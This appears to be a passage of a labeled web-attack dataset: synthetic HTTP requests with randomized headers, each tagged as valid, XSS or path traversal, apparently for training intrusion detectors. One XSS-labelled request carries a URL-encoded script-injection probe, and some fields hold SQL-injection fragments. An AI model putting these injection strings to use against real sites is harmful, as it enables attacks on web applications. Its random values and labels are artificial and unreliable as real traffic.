Trailer: If-None-Match
User-Agent: Mozilla/2.6 (Windows; U; Windows NT 8.2; ei-rv; rv:0.5.7) Gecko/15496136
UA-CPU: MIPS
UA-Disp: 5103,184,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 767x663
Via: 7.5 www.xroeeee.jpg
Transfer-Encoding: hvole; mEiee=zesq6svv
Upgrade: 8yndaa/8.9, dn8nen/3.7
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17470
Start - Id: 7041
class: Valid
PUT /dgakN9QHdqlogng/en.msf? HTTP/1.0
Content-Length: 53
Content-Language: Eooea5d,tdanu
Content-Encoding: deflate
Content-Location: /reloi/tsraondy/aoSscli.fgf
Content-MD5: ZWoxbGZ5cmVpb281YWNkUw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Jun 09 22:22:42 GMT
Last-Modified: Wed, 26 Jul 06 22:15:53 UTC
Host: www.eeecach1l.gov
Connection: keep-alive
Accept: image/png;q=0.5, video/quicktime;q=0.1, image/*
Accept-Charset: x-mac-chinesetrad;q=0.8, x-mac-arabic, x-mac-cyrillic, x-mac-ce
Accept-Encoding: deflate;q=0.6, compress;q=0.9
Accept-Language: *
Cache-Control: max-age=534
Client-ip: 42.139.126.253
Cookie: pgn21bs1si=o7kNZfQKa
Cookie2: $Version="137"
Date: Wed, 17 Dec 08 20:56:32 UTC
ETag: "S4Gpxjt.IRUVI1JtKm"
Expect: 100-continue
From: yfats@jmaNa.biz
If-Modified-Since: Wed, 18 Nov 09 06:23:05 GMT
If-Unmodified-Since: Fri, 26 Sep 08 08:29:27 GMT
If-Match: "bhy8OeWZjPcKb6KWgo"
If-None-Match: *
If-Range: Wed, 17 Jan 07 05:53:38 CET
Max-Forwards: 3
MIME-Version: 6.3
Pragma: sorefeb8=6ryecye
Proxy-Authorization: Basic RWlubnVhOmN0eDVs
Authorization: Basic c2Vlcjo3VmVCdGc=
Range: -251792
Referer: http://www.FRa8.biz/a0niu/snttexl/TNthr.pl
TE: chunked;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.3 (X11; U; Unix 9.6; it-na; rv:2.7.2) Gecko/12398526
UA-CPU: x86
UA-Disp: 1480,4443,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8498x1908
Via: 3.9 www.raugr.png, FTP/0.2 226.122.10.93, 3.8 164.8.123.137
Transfer-Encoding: compress
Upgrade: natsnn/3.2, frn/5.3, ftOtpa/1.1
Warning: 539 www.kasz3t2.jpg "c8saEyAaoa" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 484018235309
----: --------------------------------------
~~~~~: ~~~~~~~~~~

grThRng9etw=En\s ][style(avarustyle'o|y-o

End - Id: 7041
Start - Id: 48112
class: XSS
GET /menaadt/a47c7Ox/rZs8/neiYtsnAloyNmnck/t6CDDMzJsBbd2/nM2CXCkP/o-Zw/e7ewn1tgeohmne4n/fGy/eeqt/asludaeqateegc.mdb?tvryi=t%29loow4MjR%7Eol%2Bgroup+byt%3A+t&h2tcnhoasdos=eoedconnect3os5h95hhie&isl9frseeii=%3Cstyle+type%3D++%22+++text%2Fjavascript++++%22++++%3E%5Balert%28%27ezefvhe%27%29%3B%5D%3C%2Fstyle%3E&uaD7eShy=4162403&ada3fnanelm=1nDsg%3A&iewoydaai8x=+tcl&oO=i%5Cianp%3BRe-&nnbn0ht43dR=t&6yihnE3o4bhn=hsuogeai&oiitSew=0r0E%40LCC7&qc_tameta.6uWG=+csaslbuioi%5Cf&be=yWt4tMB_doC HTTP/1.0
Host: 38.220.219.58
Connection: iisl
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: *
Cache-Control: fsm2bni=eoeneogb
Client-ip: 173.206.204.20
Cookie: aelbotc8w=859163962;MmyWsasrh=H6netuo3tswte
Cookie2: $Version="832"
Date: Sun, 04 Sep 05 19:56:04 CET
ETag: W/"kb9zeiAX@fGah5yGBH"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Fri, 27 Feb 04 15:56:49 CET
If-Unmodified-Since: Mon, 14 Sep 09 22:44:45 UTC
If-Match: "xPb8iK-qdGXF1uL@"
If-None-Match: "8tHquN_kHMAMOKEl"
If-Range: "edcBr0NRKBaBU8o"
Max-Forwards: 0
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: /wssger/rocmadd/pIyon/tbte5a.cfm
TE: trailers
Trailer: Accept-Charset
User-Agent: nPbuuYHcc http://www.fonietlr.ch
UA-CPU: Sparc
UA-Disp: 367,260,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6001x2247
Via: itc/9.4 www.tnaee3a.gif, ihxe/1.2 22.35.3.209:4, 0.4 186.28.142.209
Transfer-Encoding: gzip
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 110.52.148.189
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48112
Start - Id: 12987
class: Valid
GET /djey/tszRZ3zjJJ7/afak8tfhnfigswecio/ec0PdtoroOnnewE5m3n/r0LMI0EkbIrRj9/jinput4io/wGfEn6QzgjBfayJAZ/UdCLP.mdb?aq6eW2=en+ct%3Cdmr3t&t8BRl9.=esynliipsCpR&rij=xYpG1ANMXUBs&lieg8lt14ar=cpiseehustrw&nniss=nVxhdMgTql&sd4ysetu=%3E%3E&eamtsnqrmtr=mfaqp7erImethr&GYISI6J_=sEr HTTP/1.1
Host: www.dhebi.fr:8
Connection: close
Accept: image/*;q=0.7
Accept-Charset: ks_c_5601-1987;q=0.2, hz-gb-2312, iso-2022-kr;q=0.9
Accept-Encoding: gzip;q=0.0, deflate;q=0.7, gzip;q=0.6, gzip, deflate;q=0.1
Accept-Language: *
Cache-Control: min-fresh=3290
Client-ip: 36.28.31.243
Cookie: gactb5ierhai3=rimcopybodydiEe1N;th8tlhoOriixgi=D2n;slc0geofEh8=4~;
Cookie2: $Version="3"
Date: Mon, 05 Jul 04 14:22:46 UTC
ETag: W/"@dtr3ZETT_u3A8ZN_"
Expect: 100-continue
From: picsvpm@izhyigm.biz
If-Modified-Since: Wed, 04 Oct 06 10:35:03 GMT
If-Unmodified-Since: Sat, 19 Aug 06 11:55:11 GMT
If-Match: *
If-None-Match: "oRrungw30jF8yAkQu"
If-Range: *
Max-Forwards: 124
MIME-Version: 4.1
Pragma: sZlfH2t='sE'
Proxy-Authorization: Basic cjdHaGVsOm9zZW5tbklv
Authorization: Basic bWR1ZTpjdGFl
Range: 459-
Referer: http://www.auadlf.de/7bot2xTl/t4wsii/r2ati.txt
TE: gzip,deflate
Trailer: Upgrade
User-Agent: Mozilla/9.4 (compatible; MSIE 9.8; Win98; tlselu)
UA-CPU: MIPS
UA-Disp: 8913,250,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8402x0357
Via: 5.6 127.223.120.2, 3.1 224.202.54.208, 5.0 www.eunTh.js
Transfer-Encoding: gzip
Upgrade: eir/2.5, te5s/6.4
Warning: 479 www.eorrw.html "seteahmS" 
X-Forwarded-For: 234.188.207.127
X-Serial-Number: 39169260132979
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12987
Start - Id: 661
class: Valid
GET /4oHhtpasswhereO7/ale7/oeronat8Nnolm/ew/ltj7IaztFky/Yc-2aZM/H1L/bWBxiJpvJs/im9c3wsqashdiSe8e.htm?i4hnhi7=smTGog4YV54&rmRnialhsr=f&h1=0&ifamep=7&hotii=6begu5&zA7autoexecimKxc=o%2B%3Ewwrctiltngacc&gi=ssimO&9o9ab0eneochhee=979079&etsbtfiwrh=22&idMuoi=oEgo0gnyqixSdnyr&fdtr5m1s3envor=Set6patorgsle&fssosslrsta=5361894&pj6sY=266303&anthncdrutnho=570 HTTP/1.0
Host: 18.210.68.17:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1255, koi8-r, windows-1250, shift_jis;q=0.6, windows-1253;q=0.6
Accept-Encoding: *
Accept-Language: zhr-le0stp;q=0.7, ozunmzh-o2anod, ri-i9lTmpZt;q=0.4, t-a2alny6g, g-hw9nrof
Cache-Control: ohtdN=ti5
Client-ip: 82.147.177.147
Cookie: eUkotp0@-5=eaaeutj br;eei=i ezaautoexecrpoElrusrj<~tw;ihl6y8s=Efc7h;aeooonarr=u3eT3liblsuensJRU@;noo7ehrhFaureie=3280826
Cookie2: $Version="55"
Date: Tue, 19 Jun 07 08:20:07 CET
ETag: W/"1-3oBmxj2h3PWP7ZNTC8"
Expect: 100-continue
From: i4suSHw@tttnzs.org
If-Modified-Since: Tue, 11 Jan 05 23:23:57 UTC
If-Unmodified-Since: Tue, 22 Apr 08 17:15:44 GMT
If-Match: "mtNOdpehpKaZDLkRTyw"
If-None-Match: "4cs16MsCOVrRK.hs"
If-Range: ".8@ykB2.cM5LOOgCdV"
Max-Forwards: 5
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0eSci"
Authorization: fgrit url8arnt=mtit
Range: -7,9185-99305,64-211014
Referer: http://eGtenpun.it/itssv/nin9ooeu/iipTtf/s1myoei.bin
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: Expect
User-Agent: lyjtogi (ipMNT9; n.anbTlXH; ibcNlWF; lp_N6Nu@E; l1-Xv.@)
UA-CPU: 68000
UA-Disp: 7551,458,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0578x134
Via: 9.2 www.rNn2nhfs.gif, FTP/1.8 100.54.15.173
Transfer-Encoding: gzip
Upgrade: servnt/2.1, oxLrlm/3.0, hnae/0.5, aicd/0.5, uhtthe/3.4
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 541499677250739
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 661
Start - Id: 30752
class: Valid
GET /fssbhua9iaaqgNc/3X@YAAN/itRxTonmp.gif?mjnl2o=ttou7m7&ote=667284&enobhea91ecli=uism4lyY9D2&ag=tsgeludrIe8 HTTP/1.0
Host: www.r7ifeua.de
Connection: pt5tnyaa
Accept: video/quicktime
Accept-Charset: windows-1250, utf-7;q=0.9, koi8, x-mac-greek;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 34.154.121.28
Cookie: ePdmiwkteml=5305949;seiAoe5Nesq1erd=ffc;ieaeOmozcTtcc=37132
Cookie2: $Version="4"
Date: Thu, 24 Jun 04 10:48:40 UTC
ETag: W/"bVHtsGwoY.jqZw51ltfZ"
Expect: aekemT=rsaaah
From: dzpsof6@gehphe0eb.biz
If-Modified-Since: Sat, 28 Feb 09 22:01:33 CET
If-Unmodified-Since: Sun, 13 Feb 05 10:45:16 GMT
If-Match: *
If-None-Match: *
If-Range: "4wkw.k@cBKoAIRmB"
Max-Forwards: 22
MIME-Version: 1.9
Pragma: AiEfei0o=vjdlw
Proxy-Authorization: Basic SW5ZZHJxOjdpbWxyZQ==
Authorization: wdoO uefe=jpgLftpa
Range: -62284,291093-4,3-
Referer: /utbgd.cgi
TE: deflate;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/1.9 (Windows; U; WinNT 9.4; be-se; rv:3.5.5) Gecko/46953187
UA-CPU: PowerPC
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: 7.5 www.h9eo.jpeg
Transfer-Encoding: weNi
Upgrade: nho/3.1, hrp4P/7.9, rooiEU/7.1, tryrn/3.8
Warning: 994 www.tuorse.js:74927 "slsp2oatzxr0wEyhOhx" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 567820794809201
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30752
Start - Id: 13263
class: Valid
GET /3Dplfav6isoeasy09sm/qwCeT2M2csvh1/jcn/u5xE/CRf9acopy6OGupdateHCebt/httmoseslteeM/vH@ZKrqg/i53eaocgnitreb/ldntrh.mspx?o7ieeoo1zyzcie=tepuWcOy&XaQNv0E=flu&astaartost6=ls&yAQV=de%29e&ashuuen7arm=0O2YH6Z&i4taeEdahj6qnce=8galike&Iriat2uacfO=84&atk=143696 HTTP/1.1
Host: www.5newruch.it:80
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.3, iso-8859-6;q=0.6, koi8-r
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: i='heOmi10h'
Client-ip: 102.185.236.34
Cookie: atonlopro65sud=4uN8tdn;Cb6M=202;rae9eh08b=niXwQOl
Cookie2: $Version="68"
Date: Mon, 23 Oct 06 12:13:48 CET
ETag: W/"IHhobgIcKInx@1uGfC"
Expect: oxIda=eu5R9Na;ypalmfe
From: Geng@tdt1lr9s.biz
If-Modified-Since: Tue, 07 Apr 09 09:29:57 GMT
If-Unmodified-Since: Sat, 30 Oct 04 14:27:54 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Jan 05 10:40:15 GMT
Max-Forwards: 7846
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic eXdTM3RkdGI6d3hyZg==
Authorization: waqo eoyng=si0Rtt
Range: 219-
Referer: /rsthe/pgrnFemc/tls4mjdb/u79eSvn.jpeg
TE: trailers
Trailer: Date
User-Agent: phLnE6ne/2.6.9
UA-CPU: MIPS
UA-Disp: 3770,9157,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2344x540
Via: FTP/9.5 249.138.30.4
Transfer-Encoding: deflate
Upgrade: nae/3.9, gd3t/0.5, seimar/6.1
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13263
Start - Id: 10712
class: Valid
GET /5htJ8t3PLYi/ouoasdryyAeouIup/uswtg.cfm?aAtrhtutnanv=tecabdwatEEmHddiv&1colwLNc=9&hTklaietie=4438&rfcnc=iiEvbscriptdit+1+tns&at=m8lgpi4uqa&lcbles=%3Fuait&tmouoot=7i&5t=jQwMXL4W4EB&ll=ncacceptshi5m&nSgueStt8=In3n%5Dflv&aMDw7GOe1=5sen%7E&8anlnaP82=bFAK&tn9Oaoezll7eH0=huB HTTP/1.0
Host: 119.133.67.27
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2, macintosh, iso-8859-5;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=00631
Client-ip: 123.186.199.25
Cookie: poneTtCteung2e=xu1ha;wiezac=\xp_hanphs svi ;DH0Zgroup byz=31
Cookie2: $Version="321"
Date: Mon, 16 May 05 06:52:23 UTC
ETag: "WUg9JirefD8v_q3MzuXi"
Expect: eocns=iylibw
From: apymaii@Pdts.net
If-Modified-Since: Mon, 03 May 10 09:14:20 GMT
If-Unmodified-Since: Sun, 07 Mar 04 23:25:08 GMT
If-Match: "x3QRcIVnusGiUf_CKTuk"
If-None-Match: "w@Ahps.Rk26frOq8QL9O"
If-Range: *
Max-Forwards: 902
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: ioaRE Lnhn3te=sHe04hS
Range: 569080-9470,36135-,7-
Referer: /loodf.avi
TE: deflate;q=0.3
Trailer: If-None-Match
User-Agent: seEtthJeamnnhnaadoe
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 060x417
Via: 9.6 239.95.7.48:92, st5/9.1 116.23.177.22:86758
Transfer-Encoding: deflate
Upgrade: e0Tk/8.6
Warning: 733 85.32.151.90 "MQtmgt57qqbafdmyE" 
X-Forwarded-For: 87.119.214.253
X-Serial-Number: 86511252930655335288
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10712
Start - Id: 16695
class: Valid
GET /n98nz@/wlimwanezdeh3/naaaqneEsTtoyEts/whfinoncnr6aHc6ai/gmR2GrRIi4s/Ahroebaa/aayEgl8qRnhe/ypiuaysqecn4e28cg.asmx?otytanhwn=oe5biirRdzinc&qtunrda0TssrRqo=inwlRwZ&Mar=nSFG1piHr29d&Naturnho=1 HTTP/1.0
Host: 117.189.156.225
Connection: adszto7a
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.0, big5;q=0.3, x-mac-korean;q=0.4, gb2312, x-mac-arabic
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 59.180.195.5
Cookie: DaKKftptelnetf@x0=2taSoerelrlo;ncthiio26ai=1m@e2)aeo;tt=se353a
Cookie2: $Version="48"
Date: Tue, 22 Jan 08 14:30:04 GMT
ETag: "M5uXp5W.8Kidj00P"
Expect: 100-continue
From: xtia2En@szyakI.st
If-Modified-Since: Sat, 12 Aug 06 18:51:17 GMT
If-Unmodified-Since: Sun, 15 Oct 06 21:29:56 GMT
If-Match: "U.ruBF8a3hwkpVSm"
If-None-Match: *
If-Range: Sun, 19 Nov 06 11:17:11 CET
Max-Forwards: 520
MIME-Version: 2.5
Pragma: loIi='toor'
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: enela qnsen=eahg
Range: 735-128151,-280736
Referer: http://lrfn.ch/osotttua/dp0hovl1/ktat/ll7erp.exe
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/0.7 (compatible; MSIE 3.7; Linux i386; dcoo; ycnyFianoh)
UA-CPU: 68000
UA-Disp: 7604,2520,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5546x0271
Via: 2.9 214.75.151.44:12952
Transfer-Encoding: identity
Upgrade: Tsfd/4.9, nlirha/8.6, rducee/0.6, ela/8.7
Warning: 930 96.102.226.255 "rmts" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 88173
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16695
Start - Id: 34346
class: Valid
POST /gZjjfJ1ZO3g3/oal5xkwLikJQnZC/aecpcltAW3ftsyk/aHuonot9niqjwa/drae4ao.tiff? HTTP/1.0
Content-Length: 88
Content-Language: sl
Content-Encoding: identity
Content-Location: http://www.dhFtt.net/easItNce/msh0/Ntiav/Rn9qb/inta2m.wav
Content-MD5: YTZGbnJBZEE4cUFiZW4yeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Jul 07 14:55:24 CET
Last-Modified: Sun, 30 Dec 07 07:43:13 GMT
Host: www.stsltmao.net
Connection: close
Accept: audio/*, text/xml, application/x-tar;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: it8ner-fpri3e;q=0.3, e2iPbe-brothdea, lTme-Ncoat, agth-n2Ra7ye
Cache-Control: max-age=31
Client-ip: 165.247.4.121
Cookie: o7oieenst7nf=mbinclude
Cookie2: $Version="16"
Date: Thu, 17 Feb 05 19:33:23 CET
ETag: "Jhi0.WHrMahIITB"
Expect: vrCnoab8
From: ssmwtfe1@ksfro.ch
If-Modified-Since: Tue, 19 Jun 07 17:52:54 UTC
If-Unmodified-Since: Tue, 25 Nov 08 22:09:06 CET
If-Match: *
If-None-Match: *
If-Range: "PuczPPWsD6DUy39nf"
Max-Forwards: 123
MIME-Version: 3.9
Pragma: co=piSoh
Proxy-Authorization: NTLM bXBvZG9yZVNvY2FqSG9tc3JsNWVpaWl2U3NyZmlyaGx0dG5ha3l3RQ==
Authorization: Digest opaque="ot7oiy3m"
Range: 466406-,34086-,7249-
Referer: /bdrdi5/wStteo/1aexaaa.pdf
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/0.2 (compatible; MSIE 2.7; Open BSD i386; btatUly)
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9714x0556
Via: 9.9 105.47.216.123
Transfer-Encoding: gzip
Upgrade: rdr/6.4, 3nxf/4.2, 62a3t/9.7, gmOIe/2.2, sz3/4.6
Warning: 293 www.rtrRiite.jpeg "jjzdARr7habhta13" "Sun, 15 Jun 08 16:27:29 UTC"
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 418428957866
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

isye7qtnftl=e9cl&UadminN3T3=~h&blg=k.SPoLwyvi&peao6taEE=elnss0a&T8ln=h&si2smzrdrs=9116

End - Id: 34346
Start - Id: 1535
class: Valid
GET /np7oe/yVpFtum/t@hjSVXgFm./VcVBjlfiDFnl.jpg?jisrasatejnyti=45995363&wxacgth=rfuacwaesaH9ikzpr HTTP/1.1
Host: www.3danirlciW.biz
Connection: ofta
Accept: video/*, video/*
Accept-Charset: x-mac-chinesesimp, x-mac-roman
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=56
Client-ip: 17.253.204.167
Cookie: a457fIuTtoh1=ha-Jg3UU
Cookie2: $Version="898"
Date: Thu, 01 Nov 07 15:43:01 GMT
ETag: "04JB4gAQEilyGwNW6"
Expect: 100-continue
From: sctinh@65Ad.st
If-Modified-Since: Thu, 21 Oct 04 10:04:02 CET
If-Unmodified-Since: Thu, 04 Jun 09 20:37:28 GMT
If-Match: "5dvRrpMfjspWxC9ebQ"
If-None-Match: "AUlLWbCH9W3oUZfyH"
If-Range: Tue, 14 Oct 08 02:05:08 UTC
Max-Forwards: 8453
MIME-Version: 5.1
Pragma: tfun7ahu=doxne
Proxy-Authorization: Basic c3JvaTpmYWpydHQ=
Authorization: Basic SGRlbmc6b2lhUmVvRQ==
Range: -3,-37,4261-
Referer: /7hhn.mpeg
TE: chunked,deflate;q=0.2,trailers
Trailer: From
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 2.3; xs-nn; rv:5.2.9) Gecko/54546890
UA-CPU: PowerPC
UA-Disp: 422,3598,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7934x8697
Via: 8.0 www.80tLL.shtml, 2.6 165.168.107.92:2
Transfer-Encoding: compress
Upgrade: 9gt2/5.5, leOa/8.9
Warning: 172 www.gicpsf4l.css "oo512" "Thu, 06 Jul 06 16:00:23 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 2858071636366715430
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1535
Start - Id: 27655
class: Valid
GET /86z/4ademap3olueeio7/Slike/thn2/o4uMhfrc8_7hi24-w/ruygaar.nsf?6SniNtdj=57557922&ad=579103199&ocf0lsAatt=edz9&5eitnzso=478&4IthttpsgaselectEnL=8511528746&W5FaKG=5917&crf2iDridE=pnull2em&hdtm0naqe9=c3inrplqgiafeh&Dd1lNaa7nu=t0Hs1o3xdnekir&L0Lmails806=97764&lon=389050733 HTTP/1.1
Host: www.eal8I9.uk
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4;q=0.7, iso-8859-1, windows-1252, cp-936;q=0.1, x-mac-arabic;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: ha-me;q=0.2, dittO4-CTae
Cache-Control: only-if-cached
Client-ip: 186.132.187.73
Cookie: rdNmeanNe=cojrde
Cookie2: $Version="435"
Date: Thu, 27 Oct 05 17:44:41 UTC
ETag: "4D@fFBsreTo_rtpFsp"
Expect: otne0
From: Rofmod@oeornsCta.de
If-Modified-Since: Wed, 12 Apr 06 14:00:33 UTC
If-Unmodified-Since: Sun, 16 Nov 08 23:44:09 UTC
If-Match: *
If-None-Match: "sEkvLb4tB-sCJxl2vQ"
If-Range: *
Max-Forwards: 9
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM aWxkcjU0Ym1yY2xjZW1jb29oZThJZmtsY3RTdWlpZU04
Authorization: Digest algorithm=qiihktlu
Range: 121-5135,-5
Referer: http://www.4aee3tT2.uk/Mmb87oh/atagilu.css
TE: trailers,trailers
Trailer: Via
User-Agent: 4Da4us (2_IUmDm; rfFGpRL; m9T-EdI5)
UA-CPU: x86
UA-Disp: 788,8774,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 164x477
Via: 9.5 79.249.200.160
Transfer-Encoding: gzip
Upgrade: 1gb/9.9, brgs/8.9, on8tf3/1.0
Warning: 842 www.qltnu9.shtml "xeIatr7ochui" 
X-Forwarded-For: 247.49.103.201
X-Serial-Number: 17920523075405
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27655
Start - Id: 14511
class: Valid
GET /afliw.nsf?BleoaodndmjI=may0&ooysu=844580512 HTTP/1.1
Host: 162.84.231.57
Connection: keep-alive
Accept: text/html, video/*;q=0.4, audio/*;q=0.1
Accept-Charset: x-mac-chinesesimp;q=0.8, iso-8859-1, gb2312;q=0.5, cp-936, windows-1251
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 9.124.147.67
Cookie: 7afpnnasbmannw=7;rieTttesi=aX@T.Rly;osnnetnev8nddie=o:U
Cookie2: $Version="47"
Date: Mon, 16 Aug 04 24:28:36 CET
ETag: W/"ezvAQQvnFd_H4Je1WyB"
Expect: 0cOtbl=uesE1sos;hgltdia=otqn
From: tegitG@nwslt9.biz
If-Modified-Since: Thu, 08 Jan 09 10:19:17 CET
If-Unmodified-Since: Thu, 15 Jun 06 08:19:29 CET
If-Match: "6I_mtZTv34yiR5r"
If-None-Match: "P0XhT1KfQCAPk5F"
If-Range: Thu, 03 Mar 05 17:44:16 UTC
Max-Forwards: 4987
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM cnBybUlpZmJpaW1lMnNua3Rhb2hpMHBhclRtdEV0c25zbVQ3
Authorization: NTLM ZWZpYWllaHVmZWN0cWVibHFza2FEZWhydGVqZWFlNWplY2wyRXRiVHRoTGU=
Range: 4019-22,-23,269-5
Referer: http://Gonel.cz/vi8e/brwe2fav/zrD0nods/iHsiymes.pdf
TE: trailers,trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/7.6 (Machintosh; U; Mac OS X 4.0; en-ha; rv:6.9.8) Gecko/71602513
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 311x983
Via: HTTP/4.8 148.164.43.193
Transfer-Encoding: deflate
Upgrade: r6nh/6.1, aye/0.8, ucsib/2.2
Warning: 338 80.216.37.194 "fitvnh2aoeEk" "Mon, 17 Dec 07 02:56:19 UTC"
X-Forwarded-For: 33.83.28.62
X-Serial-Number: 01337
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 14511
Start - Id: 29447
class: Valid
GET /Hqn5aclRrietape7s/agWb.PKs/cCxw5/xkssAd4foimatR/n3xj-kV7A2jayeVBKO-/9ZpflEdJCk8xD/px-FY7/sETF7/hLYo5FdLZnv3JGToZY/udeirtk4Saobeuo/x.8@Cd.jpg?8geiN=dHzW885k75&N@XL=+%3C&nRag1yI=18294&r53eurUuaE7att=eylre&c8emynntieacta=it1RW5lyUQ&ictluh4pjsu2=10507598&iq2yntanr3C3et=2174962&lyJiriw=cf HTTP/1.0
Host: 252.233.114.157
Connection: close
Accept: image/*;q=0.8, video/quicktime, text/*;q=0.6
Accept-Charset: iso-8859-8-i;q=0.7, windows-1251;q=0.5
Accept-Encoding: compress;q=0.4, compress
Accept-Language: *;q=0.0
Cache-Control: ee=cE
Client-ip: 72.151.165.169
Cookie: ienpcrf5TsiohuU=etfdrcp;tn=tya0ht0;fUhvg=betweenwe;iadtiee=oWXZ;Ia=e9N;UeHnnfcocdttie=tcL9LmcK8jfa
Cookie2: $Version="86"
Date: Tue, 24 Nov 09 19:31:38 CET
ETag: W/"JbuHPG1tQKwlK@IbGuYy"
Expect: 100-continue
From: oi5tgeaa@fpuSs.org
If-Modified-Since: Thu, 15 Apr 04 02:48:38 CET
If-Unmodified-Since: Thu, 14 Jan 10 05:34:46 UTC
If-Match: *
If-None-Match: *
If-Range: "GTRyDpTpnPc_.-@qmv"
Max-Forwards: 505
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM dVlWbHNnQXJydElwd2JzOU1zQmU2dGRpdTlJcHJyOW4=
Authorization: Digest algorithm=MD5-sess
Range: 6527-0267
Referer: http://www.hitSnja.be/in1satoq/n6sroA/oshpHe/meeot.tar.gz
TE: trailers
Trailer: Range
User-Agent: Mozilla/7.0 (compatible; Konqueror/3.3; Solaris; z2dio)
UA-CPU: PowerPC
UA-Disp: 206,807,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6889x7208
Via: FTP/2.5 233.179.168.24
Transfer-Encoding: identity
Upgrade: motr/5.8, tavtH/0.5, 3eeyua/8.2, dC8c/3.4
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 7353709606596802316
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29447
Start - Id: 46067
class: PathTransversal
